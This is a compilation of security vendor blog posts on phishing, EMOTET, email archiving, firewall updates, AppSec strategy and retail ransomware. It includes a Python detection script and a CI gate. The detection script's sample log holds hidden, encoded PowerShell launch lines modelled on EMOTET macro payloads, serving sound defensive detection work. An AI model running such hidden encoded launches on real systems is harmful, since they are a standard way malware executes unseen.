Read the full report
Download the full Phishing Insights 2021 report to dive deeper into the state of phishing and cybersecurity user education, and the timeline of this attack.
Get AI-powered phishing protection with Sophos Email
Sophos Email has multiple layers of technology to protect your users’ inboxes from phishing, and is managed from the same Sophos Central platform as our other next-gen solutions – learn more.
Source: Sophos
Sophos Managed Threat Detection, a new service from the Sophos Managed Threat Response (MTR) team, has been available since July 2021.
Sophos Managed Threat Detection provides 24/7 threat monitoring, and it is designed to run in parallel with non-Sophos endpoint protection products, which means you can continue to use your current endpoint protection while enjoying the peace of mind that comes with being monitored by Sophos threat experts.
Managed Threat Detection is tuned to detect suspicious activity that your non-Sophos endpoint protection may miss or be unable to convict, for example ransomware pre-execution and runtime activity, active adversary activity, and persistence. Depending on their severity, detections generate cases. All cases are validated by an analyst before the customer is notified. In this way the service does the heavy lifting to ensure customers receive actionable intelligence rather than being overloaded with alerts.
Clear communication is critical when running a security operations program. This is why the Managed Threat Detection service provides a steady stream of information, including weekly and monthly reports, email threat notifications in real time, and a dashboard in Sophos Central.
If incident response help is needed to respond to an active threat, the Sophos Rapid Response team is available as an additional service. Sophos Rapid Response provides fast, remote emergency assistance to investigate and neutralize active threats. Sophos customers have a built-in speed advantage, since the Rapid Response incident response team will have immediate access to the telemetry and data recorder provided by the Managed Threat Detection agents.
Source: Sophos
In the summer of 2020, malware infections were on a clear rise. Many new variants were appearing, and enterprises, government agencies, business leaders, and public officials were all voicing concern. Yet, seven years after it was first discovered, the spread of the EMOTET malware was arguably most concerning of all.
Fast-forward to January 2021 – thanks to a collective effort across the globe, EMOTET is FINALLY beginning to lose the battle. Investigators coordinated by Europol and Eurojust are effectively collaborating to interrupt the EMOTET botnet, and making significant headway. With that said, the threat potential of the malware remains worth paying attention to. Read on to learn how to protect your organization against EMOTET and similar threats.
What is EMOTET?
EMOTET, often called “the world’s most dangerous malware”, is a type of Trojan. It manifests either as standalone malware or as a delivery mechanism used to get additional payloads onto the target machine. First discovered in 2014 by Trend Micro, EMOTET was initially spotted attempting to navigate through systems and steal private information.
Since then, EMOTET has gained many modifications to bolster its arsenal. For instance, newer strains can communicate with a central server to download additional and updated malware. Today, EMOTET can easily spread through simple phishing emails that carry a malicious Office document under an eye-catching subject line. Once the document is opened, a macro inside it runs a PowerShell script, and the payload malware is downloaded to the now-infected system.
Despite the joint efforts by Europol and Eurojust, we are still seeing EMOTET variants, as well as other malware copying EMOTET’s techniques. MITRE ATT&CK techniques T1047 (Windows Management Instrumentation) and T1059.001 (PowerShell) describe two common techniques used by EMOTET.
How can I protect my organization from EMOTET and EMOTET-like attacks?
Phishing attacks are prone to a degree of success due to the persistence of poor end-user cyber hygiene and awareness. However, a number of steps can still be taken to limit the damage that attacks like EMOTET can inflict. Let’s take a look at some effective security best practices:
- First: always think before you click. Yes, this sounds simple, but following this simple advice substantively helps limit infections over the long run. Always assess whether you trust what you are about to click on before you do!
- Train your workforce. This can be in the form of targeted security awareness training for IT administrators, or more generic training for other users to ensure there is knowledge of the risks throughout your organization.
- Update, update, update! It seems that every day some application wants an update, but these updates are provided for a reason. Often the reason is to add security to applications you have installed, or to address a vulnerability that was discovered.
- Ensure the security essentials are in place – Antivirus, anti-spyware, firewalls, privileged access management (PAM), etc. If you lack these foundational security technologies, attackers do not need to use sophisticated attacks when targeting you.
- Constantly work to reduce your attack surfaces and threat exposure. An end user running with more privileges than absolutely necessary makes it a fairly easy exercise for malware to infiltrate a system and propagate through a network. Removing all unnecessary privileges helps reduce attack surfaces and also restricts the ability for lateral movement inside the network.
How BeyondTrust Privilege Management for Windows protects against phishing attacks and malware
BeyondTrust’s Privilege Management for Windows product provides manifold protections against malware, phishing exploits, and other attacks. One special product capability, called Trusted Application Protection (TAP), prevents commonly used attack chain tools from being spawned by trusted applications.
TAP Policies utilize properties of the processes on the endpoint to determine:
- What the processes are
- Their relationships with other processes
When a user opens a malicious document with a payload, the TAP Policies will block the launch of the payload, protecting the user and their endpoint.
Figure 1: How regular attacks trigger payloads
However, EMOTET can be a bit trickier than what is shown in the above figure. The EMOTET payload, a PowerShell script, is not triggered as a direct child of the trusted application. Instead, the payload is launched via a WMI call, so PowerShell.exe is not seen as a child of the trusted process.
This evasive method is increasingly being used within attacks because it makes it more difficult to track where the process originated.
In v21.3 of Privilege Management for Windows, we added our patented functionality to help protect against these more sophisticated attack techniques, such as those used by EMOTET. With our ability to track processes as they are created, including out-of-hierarchy child processes, we can block these attacks when they occur (Figure 3).
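As an added illustration of the out-of-hierarchy case described above (example code written for this article, not BeyondTrust's product logic): the script below builds a process tree from constructed Sysmon-style process-creation records and flags a script host that is either a descendant of an Office application (the Figure 1 pattern) or, as in the EMOTET pattern, a child of WmiPrvSE.exe created shortly after an Office application started. The record format, paths, PIDs, timestamps and the 120-second correlation window are all assumptions.

```python
"""Flag PowerShell launches that stem from an Office document, including the
out-of-hierarchy case where the script host is spawned by the WMI provider host
(WmiPrvSE.exe) rather than directly by the Office process.

Added example, not BeyondTrust code. Input records are constructed and loosely
modelled on Sysmon Event ID 1 fields; a real deployment should key on process
GUIDs rather than PIDs, which Windows reuses."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
WMI_HOST = "wmiprvse.exe"
CORRELATION_WINDOW = timedelta(seconds=120)  # assumption: tune per environment


@dataclass
class ProcEvent:
    time: datetime
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        """Executable name, lower-cased, without the directory path."""
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Parse one 'Key=Value|Key=Value' record (constructed format)."""
    fields = dict(kv.split("=", 1) for kv in line.split("|"))
    return ProcEvent(
        time=datetime.strptime(fields["UtcTime"], "%Y-%m-%d %H:%M:%S"),
        pid=int(fields["ProcessId"]),
        ppid=int(fields["ParentProcessId"]),
        image=fields["Image"],
        cmdline=fields["CommandLine"],
    )


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Walk the parent chain as far as the records allow, guarding against PID loops."""
    chain, seen = [], set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def detect(lines: List[str]) -> List[dict]:
    """Return one finding per suspicious script-host launch, in time order."""
    events = [parse_event(l) for l in lines if l.strip()]
    by_pid = {e.pid: e for e in events}
    office_starts = [e for e in events if e.name in OFFICE_APPS]
    findings = []
    for ev in sorted(events, key=lambda e: e.time):
        if ev.name not in SCRIPT_HOSTS:
            continue
        chain = [a.name for a in ancestors(ev, by_pid)]
        if any(n in OFFICE_APPS for n in chain):
            # Figure 1 pattern: the payload is a (grand)child of the trusted app.
            findings.append({"pid": ev.pid, "verdict": "direct-child", "chain": chain})
        elif chain and chain[0] == WMI_HOST:
            # EMOTET pattern: WMI breaks the hierarchy, so correlate on time instead.
            recent = [o.name for o in office_starts
                      if timedelta(0) <= ev.time - o.time <= CORRELATION_WINDOW]
            if recent:
                findings.append({"pid": ev.pid, "verdict": "out-of-hierarchy",
                                 "chain": chain, "recent_office": recent})
    return findings


# Constructed sample: paths, PIDs and times are illustrative only.
SAMPLE_LOG = [
    r"UtcTime=2021-08-02 08:00:00|ProcessId=700|ParentProcessId=4|Image=C:\Windows\System32\svchost.exe|CommandLine=svchost.exe -k DcomLaunch",
    r"UtcTime=2021-08-02 09:00:00|ProcessId=400|ParentProcessId=4|Image=C:\Windows\explorer.exe|CommandLine=explorer.exe",
    r"UtcTime=2021-08-02 09:00:05|ProcessId=4100|ParentProcessId=400|Image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|CommandLine=WINWORD.EXE Invoice.doc",
    r"UtcTime=2021-08-02 09:00:10|ProcessId=1200|ParentProcessId=700|Image=C:\Windows\System32\wbem\WmiPrvSE.exe|CommandLine=WmiPrvSE.exe",
    r"UtcTime=2021-08-02 09:00:12|ProcessId=5200|ParentProcessId=1200|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -nop -w hidden -enc PLACEHOLDER",
    r"UtcTime=2021-08-02 09:30:00|ProcessId=6000|ParentProcessId=400|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe",
    r"UtcTime=2021-08-02 10:00:00|ProcessId=7000|ParentProcessId=400|Image=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|CommandLine=EXCEL.EXE Report.xlsm",
    r"UtcTime=2021-08-02 10:00:03|ProcessId=7100|ParentProcessId=7000|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -nop -enc PLACEHOLDER",
    r"UtcTime=2021-08-02 12:00:00|ProcessId=8000|ParentProcessId=1200|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -File C:\Scripts\inventory.ps1",
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The interactive PowerShell under explorer.exe and the WMI-spawned inventory script two hours after the last Office launch produce no finding, which is the point of correlating on time rather than alerting on every WmiPrvSE.exe child.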

Learn more about Trusted Application Protection & Endpoint Privilege Management.
In this video, James Maude, BeyondTrust’s Lead Cyber Researcher, demonstrates how the TAP and Advanced Parent Tracking capabilities of Privilege Management for Windows prevent an attack that uses out-of-hierarchy process launches.
How to Protect against EMOTET – “The World’s Most Dangerous Malware” | BeyondTrust
Video: BeyondTrust’s Advanced Parent Tracking feature protecting against out-of-hierarchy process launches.
Source: BeyondTrust
Google Workspace, which was known as Google G Suite until October 2020, is a communication and collaboration environment that facilitates digital collaboration in many different ways. In many scenarios, however, Google Vault (Workspace’s native data management tool) fails to meet the compliance requirements of a professional email archiving system. It can therefore make sense for your company to use a third-party archiving solution in combination with Google Workspace.
Why Do Emails Need to Be Archived?
In many companies, emails are the medium of choice when it comes to transmitting business data and information. A company’s email inventory will therefore include large amounts of critical information such as contracts, invoices, personnel data, and purchase orders – all of which need to be properly retained.
Depending on the country and industry sector, different legal requirements can apply to how emails are processed and how the data they contain is stored over long periods of time so that it remains permanently available. This applies particularly to heavily regulated sectors such as healthcare and the financial industry, as well as to government institutions and educational establishments, in which sensitive personal data are often sent and received by email.
Failure to comply with the laws on email archiving can have serious consequences: for instance, a breach of archiving duties can result in fines and other sanctions and, in certain circumstances, even litigation under civil law. And another example: in the event of litigation where emails are used as evidence, or where data subjects are asserting their rights under the EU’s General Data Protection Regulation (GDPR), your company may need to search through its entire inventory of emails quickly and efficiently. This is much easier with the help of a professionally managed email archive.
Email Archiving and IT Strategy
In light of increasingly severe privacy legislation (e.g. the CCPA in California, and HIPAA and FERPA in the USA) and compliance regulations, together with the enduring popularity of electronic correspondence, every company should be proactive in its approach to email archiving. Professional archiving of business-relevant emails is not just the cornerstone of an overarching email management concept; it should be part and parcel of any IT strategy. Ultimately, with archiving you can make sure that all your emails, including any file attachments, are retained in full and in a tamper-proof manner so that they are available at all times.
Isn’t It Enough to Back Up Emails?
Email archiving and email backups are both important instruments in the context of business continuity, but one is no substitute for the other. As a rule, backups serve to protect data (ideally, including the email archive itself) in the short to medium term so that this information can be restored as required. They ensure that business-critical systems and data can be accessed even in the event of system failure or a ransomware attack. In contrast, archiving enables emails to be stored for many years in a form that is faithful to the original, easy to find, and permanently available.
How Does Email Archiving With Google Vault Work?
Google Workspace offers its users Google Vault, a software tool for information management and eDiscovery. Workspace users with a valid Vault license (see below) can store large amounts of data for any length of time, including not only emails but also files from other Workspace programs such as Google Drive, Chat, Groups, and Meet.
Who Can Use Google Vault?
Google Vault licenses for every company employee are included in the “Business Plus” and “Essentials” Workspace packages, as well as in the “Enterprise” and “Education” versions. However, if you have opted for the more affordable “Frontline”, “Business Starter” and “Business Standard” plans, you will need to purchase Vault user licenses on a monthly basis for every employee whose emails are to be archived.
With Google Vault, all the data you generate and process within your workspace can be clustered by subject, arranged into hierarchies, and visualized and exported. Administrators with the appropriate authorization can search stored data by user account, organizational unit, date, or according to certain keywords.
Authorized users can use Google Vault to view history logs, assign privileges, and manage user accounts. This can be helpful in the event of investigations, audits, and litigation where you may need to quickly access critical information held in the archive. Our white paper entitled “The Benefits of an Independent Email Archiving Solution for Users of Google Workspace” gives you detailed information on everything you need to look out for, including the role played by “holds”, and the risks that can arise if you omit to define retention rules.
What Are Google Vault’s Limitations in Terms of Email Archiving?
With Google Vault, your company can store emails and file attachments over long periods of time. According to Google, once you consent to the addendum on data processing and accept the standard contractual clauses for Google Workspace and Cloud Identity, you will meet the adequacy and security requirements defined under the EU’s GDPR. And in US geographic locations, once you accept Google’s amendment agreement for business partners, you will be “HIPAA-compliant”.
That being said, it is difficult to generalize as to whether Google Vault can meet your requirements in terms of retention and usability due to the inherent weaknesses and vulnerabilities of the solution. These include, for example, limited export functions and the risk of data loss if users or licenses are deleted. In our white paper we look at what is behind these issues and analyze some of the other vulnerabilities you may encounter.
Conclusion
Email archiving is a key component of a company’s IT strategy and information management policy. Google Vault, Workspace’s native tool for managing data and information, can be a valuable aid in this context. It does, however, come with certain vulnerabilities that can give rise to compliance and legislative issues, and you might be better off choosing independent, third-party software that has email archiving as its specialty.
Should you require detailed information on the drawbacks you can expect to encounter with Google Vault, and in which areas Google Workspace users could benefit from third-party software, we recommend our white paper.
Source: MailStore
After a successful early access program, Sophos Firewall OS v18.5 MR1 and Sophos Central SD-WAN VPN Orchestration in Sophos Central are now generally available.
SFOS v18.5 MR1
The latest version of SFOS includes many important performance, security, and feature enhancements. It wraps all the great capabilities released over the last year into a major new release that is now available on all SFOS devices: XG Series, XGS Series, virtual, software, AWS, Azure – all our supported platforms.
SFOS v18.5 MR1 is currently being pushed out to all active Sophos Firewall devices, but you can download the update from the MySophos licensing portal if you wish to get it before it appears in your console. Get the full details.
Keep your firewall firmware up to date!
And don’t forget, you can schedule firmware updates via Sophos Central if your firewalls are running v18 MR4 or later.
Sophos Central SD-WAN VPN Orchestration
If you’ve ever set up more than a couple of VPN tunnels between different firewalls, you know how time consuming and tedious this process can be. Sophos Central Orchestration makes interconnecting VPN tunnels between multiple Sophos Firewalls a quick and easy task.
What you need to take advantage of this
There are three prerequisites for Central SD-WAN VPN orchestration:
- Participating firewalls must be running SFOS v18.5 MR1 (see above)
- Participating firewalls must be managed from Sophos Central (instructions here)
- Participating firewalls must have a trial or license for Central Orchestration (see below)
Central Orchestration is a new license subscription available as a 30-day trial on all Sophos (XG) Firewall devices running SFOS. Central Orchestration is included at no extra charge as part of the new Xstream Protection bundle for Sophos Firewall and is available as a separate license subscription as well.
While all Sophos (XG) Firewall licenses are currently being migrated to the new licensing scheme over the next few weeks, you can activate a Central Orchestration trial any time through MySophos to get started with the EAP right away:
- Log into the MySophos Portal at Sophos.com/MySophos
- Navigate to: Network Protection > View Devices and click on the device for which you wish to activate the trial to pop open the license details for that device
- Check the box to evaluate Central Orchestration and click Try Now (see screen shot below)
- The license update will synchronize with the firewall within 24 hours but you can manually synchronize from the firewall under Administration > Licensing
Central Firewall Reporting Advanced
The new Central Orchestration subscription license also includes Central Firewall Reporting Advanced with 30 days of data retention in Sophos Central. This enables you to take advantage of all the great new Sophos Central reports and custom reporting tools to get deep insights across your entire estate of firewalls or any firewall group.
You can easily extend data retention up to a year through additional storage licenses. Check out the storage estimation tool to get a feel for what’s best for your particular needs.
In addition, Central Firewall Reporting Advanced also includes the Sophos XDR/MTR connector, which enables firewall data to be shared for cross-product Extended Detection and Response and our 24/7 Managed Threat Response service.
Sophos Central Firewall features coming next
The team is continually adding new features to Sophos Central for firewall management and reporting. There are two additional features heading to Central Orchestration within the coming weeks to make this capability even more helpful…
- Multiple WAN link support – enabling redundant tunnels across two WAN links. The current implementation only supports a single WAN link. This enhancement is expected in September.
- Enhanced NAT’d firewall support – supporting firewalls behind NAT devices in more scenarios to improve flexibility. This is expected to roll out following GA.
In addition, new features are planned later this year for Central Management and Reporting, including:
- Enhanced Partner Dashboard inventory view
- Streamlined onboarding of new firewalls for partners
- Firewall rule pinning
- Enhancements to backups and alerting
- Management APIs
- Added AWS region support
- Numerous usability enhancements
And there’s a lot more exciting Sophos Network Security product news coming over the next few months.
Source: Sophos
Shifting left has been a buzzword in the application security space for several years now, and with good reason – making security an integral part of development is the only practical approach for modern agile workflows. But in their drive to build security testing into development as early as possible, many organizations are neglecting application security in later phases and losing sight of the big picture.
Shifting left: misunderstood, misapplied, and absolutely necessary
In the AppSec industry, we’ve been repeating the shift left mantra for years, saying over and over that the only way to ensure effective and efficient application security testing is to integrate it with the development process. While absolutely true, this includes one tiny yet critical assumption: that you are also doing application security testing on the right, i.e. in staging and production. What’s more, the very term “shift left” can be misunderstood as moving all security testing to development – and doing that can leave gaping holes in your security.
Let’s say you do extensive security testing during development, and you feel pretty confident that as they go into staging and production, your applications contain no significant vulnerabilities. But even if that is true (and that’s a big “if”), vulnerabilities might crop up after deployment due to configuration or version differences. New vulnerabilities may be discovered in your technology stack, whether in frameworks, libraries, or other components. New attack techniques may appear in the wild. And finally, your security testing will only cover new and updated code that goes through your left-shifted pipeline – existing sites and applications will be untouched by security testing, as will third-party products that are used in your organization.
There is no question that extending security testing tools and workflows to involve the developers is a must if security is to keep up with the pace of change enforced by agile development. In fact, we have a whole white paper about it. But checking new code for vulnerabilities is only one piece of the security puzzle – and to build the complete puzzle, you need a broader view.
Building an AppSec program that works
Professional web development is not easy. Developers already have their hands full making features work while keeping up with the latest technologies and meeting all the requirements and release deadlines. If you decide to shift security testing left by simply bolting on more test tools, you are piling even more tasks and alerts onto your overworked devs. Unless they are actionable, the extra alerts will only increase noise for little security benefit.
One way to deal with this while keeping sight of the big picture is to base your application security program around dynamic application security testing (DAST). Modern DAST solutions are accurate enough to provide useful feedback to developers but also versatile enough to operate in all stages of development, testing, and production. Invicti products also feature asset discovery, so you always know what you have and what you need to secure.
For Netsparker specifically, a crucial benefit is that with Proof-Based Scanning technology, you can provide developers with actionable reports about real, exploitable vulnerabilities, complete with best-practice remediation guidance. Using out-of-the-box integrations with popular issue trackers, you can even automatically create tickets in the tools your teams already use. And when the additional IAST module is deployed, vulnerability reports for developers can include details down to the specific line of code, making remediation much easier.
This completely changes the dynamics of application security testing. Instead of a flood of vague recommendations saying “this bit could be insecure, you may want to take a look,” developers get factual, actionable tickets in their favorite issue tracker. Instead of rewriting code to make the alert go away, they know that they are fixing a specific and exploitable vulnerability that malicious actors could use to attack the application. That way, the extra work done on security issues makes a real and measurable difference to your overall security posture.
Reducing and avoiding security debt
The idea of technical debt is well-known in the development world. You might have lots of code that depends on an outdated library, but the old library is still good enough. Updating all that code would mean lots of extra work and testing, so it always gets put off for later in favor of more urgent and valuable projects. This technical debt often accumulates until something breaks, and then you fix it because you really have to. Now apply this exact same concept to security, replacing “until something breaks” with “until you have a breach” – and you have your security debt.
For application security, this debt can accumulate on many levels, from using known vulnerable components to treating your web application firewall (WAF) as a long-term solution rather than a band-aid until a vulnerability fix is ready. You might even get recurring debt, where the same types of vulnerabilities keep coming up over and over again due to poor coding practices or insufficient remediation guidance. All this adds up until many organizations give up on systematically securing all their applications because no matter what they do, their security backlog keeps growing.
The only way to deal with security debt is to resolve security issues as you go rather than sweeping them under the carpet. To get there, you need to give your developers the tools and processes to fix vulnerabilities quickly and permanently. This is where the value of a DAST-centric shift-left program with a proof-based approach becomes evident. Focusing on actual weaknesses that could be exploited by attackers helps you continuously improve security and coding practices to prevent security issues from piling up.
Security is all about the big picture
Recent high-profile incidents are finally hammering home the message that in modern web security, there’s no such thing as an unimportant application. Attackers can pick their time and place even as the attack surface of applications (and organizations) continues to grow, spanning new and existing code, multiple web technology stacks, open-source libraries, third-party components, and more. To know your true security posture, you need to start with the big picture before drilling into specific vulnerabilities.
Modern vulnerability scanning solutions such as Netsparker by Invicti are highly accurate and can run full scans in a matter of hours and incremental scans in minutes. For existing applications, this allows you to scan your entire environment for vulnerabilities as often as you need – even daily if that’s what your security policy mandates. For security testing in the development pipeline, it means giving rapid and actionable feedback to developers who can then quickly and effectively fix security issues in their own code.
All the time, you have full visibility into your current security posture while also improving your long-term application security. And because you are working with reliable data, your security and development professionals are not wasting time on inefficient communication or misleading results.
This is shifting left done right.
Source: Netsparker
The retail sector became a top target for ransomware and data-theft extortion attacks during the pandemic, as revealed in Sophos’ State of Ransomware in Retail 2021 report. Based on an independent survey of 435 IT decision makers, it explores the extent and impact of ransomware attacks on mid-sized retail organizations worldwide during 2020.
Retail is at the ransomware frontline
The results show that retail, together with education, was the sector most hit by ransomware in 2020 with 44% of organizations hit (compared to 37% across all industry sectors). Over half (54%) of the retail organizations hit by ransomware said the attackers had succeeded in encrypting their data.
Cybercriminals were quick to exploit opportunities presented by the pandemic, which in the retail sector was primarily the rapid growth in online transactions. While IT teams were busy enabling and managing this change (nearly three quarters, 72%, of respondents said their cybersecurity workload increased over 2020), adversaries targeted them with ransomware attacks.
A target for extortion-only attacks
The survey also found that retail organizations were particularly vulnerable to a small but growing new trend: extortion-only attacks, where the ransomware operators don’t encrypt files but threaten to leak stolen information online if a ransom demand isn’t paid. More than one in ten (12%) retail ransomware victims experienced this, nearly double the cross-sector average, and only central government (13%) was more affected.
A third of retail organizations pay the ransom
Paying up doesn’t pay off
Many people assume, understandably, that once you pay the ransom you get all your data back. The survey has revealed that this is not the case. Within the retail sector, those who paid got back on average only two-thirds (67%) of their data, leaving a third inaccessible; and just 9% got all their encrypted data back. This emphasises the vital importance of having backups from which you can restore in the event of an attack.
The silver lining
Fortunately, it’s not all bad news: the retail sector was the most likely to report that its IT teams were able to enhance their cybersecurity skills and knowledge over the course of 2020. While adapting to the pandemic and the increase in online trading created a considerable workload, it also provided new learning opportunities that they can take with them into the year ahead.
Read the full report
To learn more about the impact of ransomware on the retail sector around the globe, read the full State of Ransomware in Retail 2021 report.
Source: Sophos
To maintain the best possible security stance and protect your sensitive data against cyberattacks, you cannot just rely on security products alone. Here is a list of seven key elements that we believe should be considered in your web app security strategy.
1. Include everyone in security practices
Some businesses still believe that security should only be the concern of a specialized team. In the current business environment, such an approach is not viable:
- The increasing cybersecurity skill gap means that security teams are unable to catch up to business growth.
- A dedicated security team becomes a bottleneck in the development processes.
- If security is reactive, not proactive, there are more issues for the security team to handle.
The current best practice for building secure software is called SecDevOps. This approach, which goes further than DevSecOps, assumes that every person involved in web application development (and any other application development) is in some way responsible for security. Developers know how to write secure code. QA engineers know how to apply security policies to their tests. All the management and executives have security in mind when making key decisions.
An effective secure DevOps approach requires a lot of education. Everyone must be aware of the security threats and risks, understand potential application vulnerabilities, and feel responsible for security. While this requires a lot of time and effort, the investment pays off with top-notch secure applications.
2. Adopt a cybersecurity framework
Cybersecurity is very complex and requires a well-organized approach. It’s easy to forget about certain aspects and just as easy to fall into chaos. That is why many organizations base their security strategy on a selected cybersecurity framework.
A cybersecurity framework is a strategic approach that begins with detailed research on security risks and includes activities such as developing a cyber incident response plan along with suitable application security checklists. The bigger the organization, the more such a strategic approach is needed.
Another advantage of adopting a cybersecurity framework is the realization that all cybersecurity is interconnected and web security cannot be treated as a separate problem.
3. Automate and integrate security tools
In the past, security teams performed application security testing manually using dedicated security solutions. For example, a security researcher would first use a simple vulnerability scanner and then manually perform additional penetration testing using open-source tools. However, in the current security landscape, such an approach is not optimal. Just like in the whole IT industry, the most efficient IT security processes are based on automation and integration.
Many security tools are now developed with such automation and integration in mind. For example, business-grade vulnerability scanners are intended to be integrated with other systems such as CI/CD platforms and issue trackers. There are several advantages to such an approach:
- The less manual work, the less room for error. If security processes are automated and integrated, nobody can, for example, forget about scanning a web application before it is published.
- If security is integrated into the software development lifecycle (SDLC), issues can be found and eliminated much earlier. This saves a lot of time and makes remediation much easier.
- If security tools work together with other solutions used in software development, such as issue trackers, security issues can be treated the same as any other issue. Engineers and managers don’t lose time learning and using separate tools for security purposes.
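As an added example (not code from the Acunetix article), here is the kind of glue that makes the three points above concrete: a small Python CI gate that reads scanner output, ignores findings already tracked in a baseline, fails the build only on new findings at or above a severity threshold, and produces one issue-tracker payload per new finding so security issues land in the same queue as everything else. The report shape, the rule names and the file paths are constructed for the demonstration; a real integration would read the scanner's own report format and call the tracker's API.

```python
import hashlib
import json

# Constructed scanner output in a generic shape; it is not the format of any
# particular product. A real integration would read the tool's own report.
SCAN_REPORT = json.loads("""
[
  {"rule": "sql-injection",   "severity": "high",   "path": "app/users.py",      "line": 42},
  {"rule": "xss-reflected",   "severity": "medium", "path": "app/search.py",     "line": 17},
  {"rule": "weak-tls-config", "severity": "high",   "path": "deploy/nginx.conf", "line": 8}
]
""")

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}


def fingerprint(finding: dict) -> str:
    """Stable identity for a finding: rule plus file, deliberately not the
    line number, so unrelated edits that shift lines neither make a known
    issue look new nor let it escape the ticket already opened for it."""
    raw = f"{finding['rule']}|{finding['path']}"
    return hashlib.sha256(raw.encode()).hexdigest()[:16]


def triage(findings: list, baseline: set, threshold: str = "high") -> dict:
    """Split findings into known (fingerprint already in the baseline), new,
    and blocking (new and at or above the severity threshold)."""
    known, new, blocking = [], [], []
    for f in findings:
        if fingerprint(f) in baseline:
            known.append(f)
            continue
        new.append(f)
        if SEVERITY_RANK[f["severity"]] >= SEVERITY_RANK[threshold]:
            blocking.append(f)
    return {"known": known, "new": new, "blocking": blocking}


def gate_passes(findings: list, baseline: set, threshold: str = "high") -> bool:
    """The CI decision: fail the pipeline only on new findings above threshold."""
    return not triage(findings, baseline, threshold)["blocking"]


def ticket_payloads(new_findings: list) -> list:
    """One issue-tracker payload per new finding (generic fields, not any
    specific tracker's API)."""
    return [
        {
            "title": f"[{f['severity']}] {f['rule']} in {f['path']}",
            "body": f"Reported by scanner at {f['path']}:{f['line']}",
            "fingerprint": fingerprint(f),
            "labels": ["security", f["severity"]],
        }
        for f in new_findings
    ]


if __name__ == "__main__":
    # The TLS finding is already tracked in the baseline; everything else is new.
    baseline = {fingerprint(SCAN_REPORT[2])}
    result = triage(SCAN_REPORT, baseline)
    print("pipeline passes:", gate_passes(SCAN_REPORT, baseline))
    print(json.dumps(ticket_payloads(result["new"]), indent=2))
```

The baseline set is what keeps the gate from becoming noise: accepted or already-ticketed findings never block a build twice, while anything new above the threshold stops the pipeline at the commit that introduced it.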
4. Follow secure software development practices
There are two key aspects to secure software development:
- Practices that help you make fewer errors when writing application code
- Practices that help you detect and eliminate errors earlier
In the first case, software developers must be educated about potential security problems. They must understand SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), and other vulnerabilities and misconfigurations such as the ones listed in the OWASP Top 10. They must also know the secure coding techniques required to prevent such vulnerabilities; for example, they must know how to prevent SQL injection.
In the second case, what helps most is scanning for security vulnerabilities as early as possible in the development lifecycle. If you integrate security tools into your DevOps pipelines, as soon as the developer commits new or updated functionality, they are informed about any vulnerabilities in it. Because this is done immediately, it also makes such vulnerabilities much easier to fix because the developer still remembers the code that they were working on. It also guarantees that the developer can correct their own code, and not waste time trying to understand code written by someone else a long time ago.
5. Use diverse security measures
There are many aspects of web security, and no single tool can be perceived as the one measure that guarantees complete safety. The key tool for web application security is the vulnerability scanner. However, even the best vulnerability scanner will not discover every vulnerability: logical errors, for example, or flaws behind complex access control and authentication schemes, still require human intervention.
Vulnerability scanning must not be treated as a replacement for penetration testing. Also, to fully secure web servers, vulnerability scanning must be combined with network scanning. Luckily, some vulnerability scanners are integrated with network security scanners, so the two activities may be handled together.
In addition to vulnerability scanners based on DAST or IAST technologies, many businesses also choose to use a SAST (source code analysis) tool at early stages, for example in the SecDevOps pipelines or even earlier, on developer machines. Such a tool is a very useful addition, but because of its limitations (such as the inability to cover third-party elements), it cannot replace a DAST tool.
Some businesses believe that the best way to protect against web-related threats is to use a web application firewall (WAF). However, a WAF is just a band-aid tool that eliminates potential attack vectors. While a WAF is an important part of a complete security suite for an enterprise and the best way to handle zero-day vulnerabilities through virtual patching, it should not be treated as the most important line of defense.
All in all, you should use diverse security measures, but you should not just believe that purchasing them and giving them to your security team will solve the problem. These security measures must be integrated with your entire environment and automated as much as possible. They are there to reduce the amount of work that the security team has, not increase it.
6. Perform security exercises
One of the best ways to check whether your sensitive information is safe is to perform mock attacks. This is the key assumption behind penetration testing, but penetration tests are just spot-checks. To fully and continuously evaluate your security stance, the best way is to perform continuous security exercises such as red team vs. blue team campaigns.
The idea behind red teaming is to hire an external organization that continuously tries to challenge your security and to establish a local team that is in charge of stopping such attempts. There are many advantages to this approach. A continuous exercise means that your business is always prepared for an attack. It also helps with maintaining general security awareness, since the blue team involves much more than just a dedicated security team.
A dedicated red team does not just exploit security vulnerabilities. They often perform different types of mock attacks (including phishing, social engineering, DDoS attacks, and others) to help you protect against real ones. The added advantage is also the realization of how different security elements are woven together and cannot be treated separately.
7. Maintain a bounty program
Many top-notch security professionals prefer to work as freelancers instead of being hired by businesses either full-time or on a project basis. Losing out on such outstanding expertise is a huge waste. Your business can use such valuable resources by establishing a bounty program.
While some businesses may perceive a bounty program as a risky investment, it quickly pays off. It also increases the respect that your brand has in the hacking community and, consequently, the general brand perception. If you have a bounty program and treat independent security experts fairly, your brand is perceived as mature and proud of its security stance. You may strengthen such perception by publicly disclosing bounty program payoffs and responsibly sharing information about any security vulnerability discoveries and data breaches.
Source: Acunetix
Optimizing Managed Threat Response (MTR) and Extended Detection and Response (XDR) with Security Orchestration Automation and Response (SOAR) Capabilities.
